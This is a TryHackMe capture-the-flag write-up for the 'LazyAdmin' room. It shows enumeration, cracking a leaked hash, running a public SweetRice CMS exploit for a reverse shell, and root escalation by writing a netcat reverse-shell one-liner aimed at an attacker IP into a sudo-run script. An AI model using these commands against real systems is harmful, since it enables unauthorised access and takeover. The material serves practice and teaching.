#9.TryHackMe Series writeups-LazyAdmin

Hey 👋,Welcome back to series, it is time to solve another challenge i.e. “LazyAdmin”.

Have some fun! There might be multiple ways to get user access in LazyAdmin.

So lets start ..!!!

Here first we need to enumerate the box. We did a nmap scan to know the open ports.

Command: nmap -sV -sC <IP>

After executing the command, we can see the open ports and services running. Here, 2 ports are open i.e. HTTP and SSH.

Let’s try to access the http website running on it.

This is a default page. So, let’s try to look for different endpoints for the website. For that, we will be using directory bruteforcing tool i.e. “gobuster”.

Commands: gobuster dir -u http://<IP>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

We can see “/content” endpoint. So let’s access this endpoint.

We will try to check for more directories.

Commands: gobuster dir -u http://<IP>/content/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

We got many directories now, as we check “/as” directory contains login page and “/inc” contains files.

Here we got mysql_bakup file where we found the credentials.

Here we can see the username as manager and password is in hash which needs to be cracked.

Command: hashcat -m 0 /root/hash.txt /usr/share/wordlists/rockyou.txt

Now using the credentials, we can login to the page.

We can see SweetRice CMS version number. Let’s check for the exploit for the CMS.

Download the exploit.

Now we run the exploit which we downloaded. When you’ll read the exploit there is a file needed to get the reverse shell. So we will download reverse shell script.

Note: In reverse shell script, change the IP and Port to open the Netcat listener.

Command: python3 40716.py

Hurray, we got the reverse shell. So, now let’s see for the flag.

Command: find / -name user.txt 2>/dev/null

It’s time to escalate our privilege to root.

We can check the permissions of the current user with commnad.

Command: sudo -l

Let’s check what’s there in the “backup.pl” file. When viewed, there is a copy.sh file present which contains script and it has write permissions.

So, what we can do is to add revserse shell script into the “copy.sh” and will open the netcat listener.

Command: echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attcker IP> 5555 >/tmp/f” > /etc/copy.sh

Command: sudo /usr/bin/perl /home/itguy/backup.pl

Run the above command, we got the shell. Let’s check for the flag.

Well, we are root now!

Hurrah!! This LazyAdmin is now over. Thank you for sticking around.